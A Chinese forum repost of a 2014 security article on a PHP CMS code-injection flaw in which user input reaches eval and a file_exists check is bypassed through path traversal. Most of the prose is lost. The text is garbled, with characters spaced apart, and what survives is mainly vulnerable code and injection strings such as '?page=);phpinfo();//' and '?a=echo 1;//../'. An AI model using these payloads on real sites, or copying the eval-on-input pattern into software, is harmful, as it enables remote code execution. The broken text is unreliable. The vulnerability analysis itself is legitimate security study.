搜索

[8485] 2014-12-10_代码安全审计:当file_exists遇上eval

文档创建者:s7ckTeam
浏览次数:4
最后更新:2025-01-17
2014-12-10_代码安全审计:当file_exists遇上eval f i l e _ e x i s t s e v a l c r s e c   F r e e B u f   2 0 1 4 - 1 2 - 1 0 Q Q l c m s C M S r o u t e r . p h p   g e t I n p u t S t r i n g P r e g _ m a t a c h _ a l l   $ f o r m a t   / [ G | P | C | S | R | F ] /     $ m a t c h e s   G P C S   $ G L O B A L S   $ G L O B A L S   h t t p : / / p h p . n e t / m a n u a l / z h / r e s e r v e d . v a r i a b l e s . g l o b a l s . p h p $ G L O B A L S [ $ f o r m a t _ d e f i n e s [ $ g l b ] ] [ $ n a m e ]   $ f o r m a t _ d e f i n e s   _ G E T g e t   n a m e a d d s l a s h e s   a d d s l a s h e s h t t p : / / w w w . w 3 s c h o o l . c o m . c n / p h p / f u n c _ s t r i n g _ a d d s l a s h e s . a s p
  g e t I n p u t S t r i n g     c o r e / p l u g s / " . $ p l u g i n . " S t a r t e r . p h p     e v a l   e v a l h t t p : / / w w w . w 3 s c h o o l . c o m . c n / p h p / f u n c _ m i s c _ e v a l . a s p   $ p a g e   ? p a g e = ) ; p h p i n f o ( ) ; / /     e v a l   n e w   . $ p l u g i n . s t a r t e r ( ) ; p h p i n f o ( ) ; / / ) e v a l   p h p i n f o ( ) :
$ p l u g i n p h p i n f o   ? a = e c h o   1 ; / / . . / 1 1 . p h p , < ? p h p     $ a c t = $ _ G E T [ ' a ' ] ; i f   ( f i l e _ e x i s t s ( ' t e s t / ' . $ a c t . ' 2 . p h p ' ) )   { e v a l ( " e c h o   ( ' 2 ' ) ; " . $ a c t ) ; } ? > t e s t 1 2 . p h p f i l e _ e x i s t s e v a l     t e s t     * 2 . p h p 1 . p h p ? a = 1     1   1 . p h p ? a = e c h o   1 ; / / . . / h t t p : / / l o c a l h o s t / 1 . p h p ? a = e c h o % 2 0 1 ; / / . . / 1   1       e c h o   1   i f   ( f i l e _ e x i s t s ( ' t e s t / e c h o   1 ; / / . . / 1 2 . p h p ' ) )
e v a l   f i l e _ e x i s t s   e c h o   1 ; /       / . . /     i f ( f i l e _ e x i s t s ( ' t e s t / 1 2 . p h p ' ) )   t e s t 1 2 . p h p t u r e e v a l E v a l     e v i l ( e c h o   ( 2 ) ; e c h o   1 ; / / . . / 1 )   / /     2 1   使 e v a l   C M S $ p l u g i n     /   , $ p a g e   c s m f i l e _ e x i s t s     e v a l   西 西 C M S :   h t t p : / / p a n . b a i d u . c o m / s / 1 v r i 8 Y   :   o k p q [ c r s e c F r e e B u f . C O M ]
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理